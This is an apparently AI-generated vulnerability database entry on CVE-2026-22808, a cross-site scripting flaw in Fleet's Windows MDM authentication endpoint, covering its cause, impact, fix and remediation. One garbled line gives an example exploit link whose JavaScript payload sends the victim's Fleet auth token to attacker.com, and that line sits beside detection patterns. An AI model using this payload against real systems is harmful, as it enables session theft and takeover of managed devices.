
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-22808 is a Cross-Site Scripting (XSS) vulnerability in Fleet's Windows MDM authentication endpoint (mdmMicrosoftAuthEndpoint) that allows an attacker to steal authenticated users' Fleet session tokens. It affects FleetDM Fleet versions prior to 4.53.3, 4.75.2, 4.76.2, 4.77.1, and 4.78.2 (Go module github.com/fleetdm/fleet). The vulnerability was disclosed on January 20, 2026, and patched the same day. It carries a CVSS v3.1 score of 5.4 (Medium) and a CVSS v4.0 score of 5.5 (Medium) (Github Advisory, Fleet Advisory).
The root cause is improper neutralization of user-controlled input in the Windows MDM Security Token Service (STS) authentication flow (CWE-79). Specifically, the appru URL parameter passed to the mdmMicrosoftAuthEndpoint was not validated for scheme or content before being reflected into an HTML response rendered by the server, previously using text/template instead of the safer html/template. An attacker crafts a malicious link containing a JavaScript payload (e.g., javascript:alert(1), data:text/html,..., or raw JS injection) in the appru query parameter targeting the MDE2AuthPath endpoint; when an authenticated Fleet user visits this link, the payload executes in their browser context. The fix added an isValidAppru() function that allowlists only http, https, and ms-app URL schemes, and switched template rendering to html/template for proper escaping (Fleet Advisory, Patch Commit).
Successful exploitation allows an attacker to steal the Fleet authentication token from the victim's browser, which may grant administrative access to the Fleet API. With administrative API access, an attacker could deploy scripts to all managed hosts, modify device configurations, or exfiltrate sensitive device management data across the entire managed fleet. The vulnerability only affects instances where Windows MDM is enabled and requires the victim to be an authenticated Fleet user, limiting but not eliminating the risk of broad organizational compromise (Fleet Advisory).
No public proof-of-concept exploit code or in-the-wild exploitation has been reported for this vulnerability. The EPSS score is approximately 0.047–0.128%, indicating a low near-term exploitation probability. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires social engineering an authenticated Fleet user into clicking a crafted link, and Windows MDM must be enabled on the target instance (Github Advisory, Fleet Advisory).
appru parameter, e.g.:https://<fleet-instance>/api/mdm/microsoft/auth?appru=javascript:fetch('https://attacker.com/?token='+localStorage.getItem('FLEET::auth_token'))&login_hint=victim@example.com/api/mdm/microsoft/auth or the MDE2AuthPath equivalent) with suspicious appru parameter values containing javascript:, data:, or encoded script payloads.Fleet has released patched versions addressing this vulnerability: 4.78.2, 4.77.1, 4.76.2, 4.75.2, and 4.53.3. Organizations should upgrade to one of these versions immediately. As an interim workaround if an immediate upgrade is not possible, disable Windows MDM in Fleet, as the vulnerability does not affect instances where Windows MDM is disabled. For questions, contact Fleet security at security@fleetdm.com or via the #fleet channel in the osquery Slack (Fleet Advisory, Github Advisory).
The vulnerability was responsibly disclosed by researcher @secfox-ai (GitHub: prateek-0490) and remediated by Fleet developer iansltx. Fleet published the advisory and patch on the same day (January 20, 2026), demonstrating a rapid response. No significant broader media coverage or notable community controversy has been identified beyond standard vulnerability database aggregation (Fleet Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."